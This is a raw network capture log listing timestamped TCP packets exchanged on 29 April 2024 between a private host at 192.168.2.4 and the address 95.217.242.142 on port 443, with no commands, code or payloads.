                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.115148067 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.136630058 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.136646032 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.136699915 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.136709929 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.136739016 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.136748075 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.158581972 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.158597946 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.158652067 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.158670902 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.158693075 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.158713102 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.181282997 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.181301117 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.181368113 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.181377888 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.181410074 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.181418896 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.200345039 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.200367928 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.200407028 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.200417042 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.200467110 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.200486898 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.217360020 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.217376947 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.217421055 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.217432022 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.217462063 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.217479944 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.234934092 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.234952927 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.235143900 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.235155106 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.235244036 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.253196955 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.253215075 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.253262997 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.253273964 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.253299952 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.253319025 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.266793966 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.266817093 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.266866922 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.266880989 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.266913891 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.266927958 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.283935070 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.283951044 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.284002066 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.284015894 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.284034967 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.284059048 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.297359943 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.297377110 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.297420979 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.297430992 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.297442913 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.297472954 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.313064098 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.313086033 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.313128948 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.313138962 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.313169956 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.313184977 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.326839924 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.326864004 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.326940060 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.326940060 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.326948881 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.326987982 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.339183092 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.339198112 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.339245081 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.339256048 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.339283943 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.339302063 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.353488922 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.353511095 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.353549957 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.353559971 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.353591919 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.353611946 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.364511013 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.364535093 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.364579916 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.364592075 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.364624023 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.364634991 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.376492977 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.376509905 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.376560926 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.376573086 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.376595020 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.376615047 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.387340069 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.387356997 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.387398958 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.387411118 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.387439013 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.387449980 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.399071932 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.399089098 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.399149895 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.399161100 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.399189949 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.399209023 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.408891916 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.408910036 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.408967972 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.408977985 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.409008026 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.409019947 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.419090986 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.419107914 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.419184923 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.419194937 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.419236898 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.428493023 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.428508043 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.428590059 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.428599119 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.428644896 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.438787937 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.438803911 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.438874960 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.438889027 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.438930988 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.447160959 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.447177887 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.447246075 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.447254896 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.447300911 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.456125021 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.456141949 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.456185102 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.456193924 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.456228971 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.456238031 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.465471029 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.465486050 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.465532064 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.465538979 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.465574980 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.465594053 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.473247051 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.473263025 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.473329067 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.473341942 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.473381042 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.482100964 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.482119083 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.482182026 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.482191086 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.482219934 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.482229948 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.488744974 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.488763094 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.488816023 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.488823891 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.488853931 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.488864899 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.495857000 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.495910883 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.495934963 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.495940924 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.495978117 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.495991945 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.502923965 CEST49764443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.502942085 CEST4434976495.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.706945896 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.707000971 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.707081079 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.707302094 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:19.707318068 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.178237915 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.178399086 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.178814888 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.178828955 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.178977013 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.178983927 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.924570084 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.924595118 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.924609900 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.924673080 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.924695969 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.924714088 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:20.924748898 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.030057907 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.030078888 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.030234098 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.030245066 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.030294895 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.182212114 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.182231903 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.182305098 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.182316065 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.182363987 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.286868095 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.286890984 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.287013054 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.287025928 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.287081003 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.367475986 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.367495060 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.367598057 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.367609024 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.367661953 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.424595118 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.424609900 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.424863100 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.424870968 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.424926043 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.471278906 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.471297026 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.471371889 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.471380949 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.471424103 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.515937090 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.515953064 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.516035080 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.516050100 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.516089916 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.559819937 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.559844017 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.559925079 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.559935093 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.559981108 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.604850054 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.604866982 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.604973078 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.604984045 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.605031967 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.643569946 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.643588066 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.643663883 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.643676043 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.643821955 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.670423031 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.670439005 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.670612097 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.670619011 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.670665979 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.696897984 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.696914911 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.697005033 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.697015047 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.697058916 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.719321012 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.719340086 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.719413996 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.719424963 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.719477892 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.742103100 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.742124081 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.742187977 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.742196083 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.742239952 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.764974117 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.764991045 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.765049934 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.765060902 CEST4434976695.217.242.142192.168.2.4
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.765093088 CEST49766443192.168.2.495.217.242.142
                                                                                                                                                                                                                                                            Apr 29, 2024 22:13:21.765115976 CEST49766443192.168.2.495.217.242.142
